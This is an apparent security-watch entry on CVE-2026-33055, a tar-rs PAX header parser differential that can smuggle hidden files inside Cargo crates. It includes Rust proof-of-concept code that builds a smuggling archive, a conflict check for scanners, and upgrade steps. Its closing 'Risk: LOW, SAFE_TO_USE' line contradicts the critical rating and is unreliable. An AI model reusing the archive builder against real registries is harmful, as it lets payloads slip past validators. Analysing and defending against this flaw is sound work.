FIND-20260330-012 · 2026-03-30 · Innovation Veille
Cargo tar-rs CVE-2026-33055 (CVSS 9.4 Critical) — archive smuggling via PAX header parser differential
cve
HIGH
CVE-2026-33055 (CVSS 9.4 CRITICAL) in the Rust tar-rs crate (≤ 0.4.44), the TAR reader Cargo uses to unpack downloaded crates, lets an attacker smuggle hidden TAR entries past security validators through a parser differential in PAX extended header handling. POSIX specifies that a PAX `size` record overrides the size field of the ustar header that follows it, and compliant readers such as GNU tar and Go's archive/tar apply that override unconditionally. tar-rs ≤ 0.4.44 applies it only when the ustar size field is zero; when that field is nonzero it keeps the ustar value and ignores the PAX record. The two readers therefore disagree on where the entry's data ends and where the next header begins. In the simplest case a crafted .crate declares a large PAX size and a small ustar size: a compliant scanner reads the whole region as one file's data and never parses the extra headers embedded in it, while tar-rs stops at the small size, treats those embedded headers as further entries, and extracts payload files the scanner never saw. Fixed in tar-rs 0.4.45, shipped with Rust 1.94.1. Separate from CVE-2026-33056 (symlink chmod).
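How the differential plays out on a concrete archive, as an added example that is not code from the advisory or from the tar-rs project and uses only the Rust standard library: `build_smuggling_archive` constructs a sample .tar in which a PAX `size` record (1536 bytes) disagrees with the ustar size field (5 bytes) of the entry it precedes, and `walk` parses it under both rules. The `PaxOnlyIfBaseZero` rule models only what the advisory states about tar-rs ≤ 0.4.44 and is not tar-rs code; the entry names and file contents are constructed for the example. The conflict flag `walk` returns is the check a scanner can add regardless of which reader sits downstream: a PAX size that disagrees with a nonzero ustar size is an archive no two readers are guaranteed to agree on, so reject it.

```rust
// Added example, not code from the advisory or the tar-rs project: a std-only TAR
// writer and reader that reproduce the PAX `size` parser differential. The buggy
// rule models only what the advisory states about tar-rs <= 0.4.44.
const BLOCK: usize = 512;

#[derive(Clone, Copy)]
enum SizeRule {
    PaxAlwaysWins,     // POSIX behaviour (GNU tar, Go archive/tar)
    PaxOnlyIfBaseZero, // tar-rs <= 0.4.44: PAX wins only if the ustar size is 0
}

fn blocks(n: usize) -> usize {
    (n + BLOCK - 1) / BLOCK * BLOCK // round up to whole 512-byte blocks
}

/// One ustar header block (typeflag b'0' = regular file, b'x' = PAX header).
/// Mode, uid, gid and mtime stay zero; the reader below does not look at them.
fn ustar_header(name: &str, size: usize, typeflag: u8) -> [u8; BLOCK] {
    let mut h = [0u8; BLOCK];
    h[..name.len()].copy_from_slice(name.as_bytes());
    h[124..135].copy_from_slice(format!("{:011o}", size).as_bytes());
    h[156] = typeflag;
    h[257..265].copy_from_slice(b"ustar\x0000"); // magic "ustar\0" + version "00"
    // The checksum is computed with its own field read as eight spaces.
    h[148..156].copy_from_slice(b"        ");
    let sum: u32 = h.iter().map(|&b| u32::from(b)).sum();
    h[148..155].copy_from_slice(format!("{:06o}\0", sum).as_bytes());
    h
}

/// One PAX record "LEN key=value\n", where LEN counts itself.
fn pax_record(key: &str, value: &str) -> Vec<u8> {
    let body = format!(" {}={}\n", key, value);
    let mut len = body.len() + 1;
    while len.to_string().len() + body.len() != len {
        len = len.to_string().len() + body.len();
    }
    format!("{}{}", len, body).into_bytes()
}

/// Constructed sample: PAX `size`=1536 over a ustar size of 5, with a second
/// header hidden inside the region the PAX size claims as payload.bin's data.
fn build_smuggling_archive() -> Vec<u8> {
    let mut tar = Vec::new();
    let pax = pax_record("size", "1536");
    tar.extend_from_slice(&ustar_header("PaxHeaders/payload.bin", pax.len(), b'x'));
    tar.extend_from_slice(&pax);
    tar.resize(blocks(tar.len()), 0);
    tar.extend_from_slice(&ustar_header("payload.bin", 5, b'0'));
    tar.extend_from_slice(b"hello");
    tar.resize(blocks(tar.len()), 0);
    // A POSIX reader skips 1536 bytes (three blocks) from here and never parses
    // this header; the buggy reader skips one block and extracts hidden.sh.
    let hidden = b"#!/bin/sh\necho pwned\n";
    tar.extend_from_slice(&ustar_header("hidden.sh", hidden.len(), b'0'));
    tar.extend_from_slice(hidden);
    tar.resize(blocks(tar.len()), 0);
    tar.extend_from_slice(&[0u8; 2 * BLOCK]); // end-of-archive marker
    tar
}

/// Walk the archive under one size rule. Returns (name, size) per entry and
/// whether any entry's PAX size disagreed with a nonzero ustar size.
fn walk(tar: &[u8], rule: SizeRule) -> (Vec<(String, usize)>, bool) {
    let octal = |f: &[u8]| usize::from_str_radix(String::from_utf8_lossy(f).trim_matches(|c: char| c == '\0' || c == ' '), 8).unwrap_or(0);
    let (mut entries, mut conflict, mut pos, mut pax_size) = (Vec::new(), false, 0, None);
    while pos + BLOCK <= tar.len() {
        let h = &tar[pos..pos + BLOCK];
        if h.iter().all(|&b| b == 0) { break; } // end-of-archive marker
        let name = String::from_utf8_lossy(&h[..100]).trim_end_matches('\0').to_string();
        let base_size = octal(&h[124..136]);
        pos += BLOCK;
        if h[156] == b'x' {
            // PAX extended header: remember a `size` override for the next entry.
            let text = String::from_utf8_lossy(&tar[pos..(pos + base_size).min(tar.len())]);
            for rec in text.lines() {
                if let Some(("size", v)) = rec.split_once(' ').and_then(|(_, kv)| kv.split_once('=')) {
                    pax_size = v.parse::<usize>().ok();
                }
            }
            pos += blocks(base_size);
            continue;
        }
        let pax = pax_size.take();
        conflict |= matches!(pax, Some(p) if base_size != 0 && p != base_size);
        let size = match (rule, pax) {
            (_, None) => base_size,
            (SizeRule::PaxAlwaysWins, Some(p)) => p,
            (SizeRule::PaxOnlyIfBaseZero, Some(p)) => if base_size == 0 { p } else { base_size },
        };
        entries.push((name, size));
        pos += blocks(size);
    }
    (entries, conflict)
}

fn main() {
    let tar = build_smuggling_archive();
    let (posix, conflict) = walk(&tar, SizeRule::PaxAlwaysWins);
    println!("POSIX reader sees:  {:?}", posix);
    println!("tar-rs-style sees:  {:?}", walk(&tar, SizeRule::PaxOnlyIfBaseZero).0);
    println!("scanner check, PAX/ustar size conflict: {}", conflict);
}
```

Compiled with rustc and run, the POSIX reader reports a single entry (payload.bin, 1536 bytes) while the tar-rs-style reader reports two (payload.bin, 5 bytes, then hidden.sh, 21 bytes); hidden.sh is the smuggled entry, and the conflict flag is true for this archive under either rule. The same walker with real header checksum verification would make a reasonable pre-extraction gate for a private registry mirror.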
Source
https://rustsec.org/advisories/
ODS Impact
Any ODS CI build environment running Rust ≤ 1.94.0 is exposed whenever Cargo unpacks a crate from a private or third-party registry or from a Git dependency: Cargo itself extracts downloaded crates with tar-rs, so the exposure is not limited to projects that depend on the `tar` crate directly. crates.io audited all published crates and confirmed no exploitation, but that audit covers crates.io only; internal registries, third-party registries and Git dependencies are not covered. Upgrade the Rust toolchain to 1.94.1+ (`rustup update stable`, then confirm with `cargo --version`) in all GitHub Actions runners and Docker build images immediately. Separately, any ODS service that unpacks untrusted archives with the `tar` crate itself must bump that dependency to 0.4.45+ (`cargo tree -i tar` lists the crates in a workspace that pull it in; `cargo update -p tar` refreshes Cargo.lock), since a toolchain upgrade does not change the version pinned in a project's lock file.
Security Review
License: MIT / Apache-2.0 | Maintenance: ACTIVE | Risk: LOW | Recommendation: SAFE_TO_USE
Tags
rust
cargo
tar
cve
critical
supply-chain
parser-differential
ci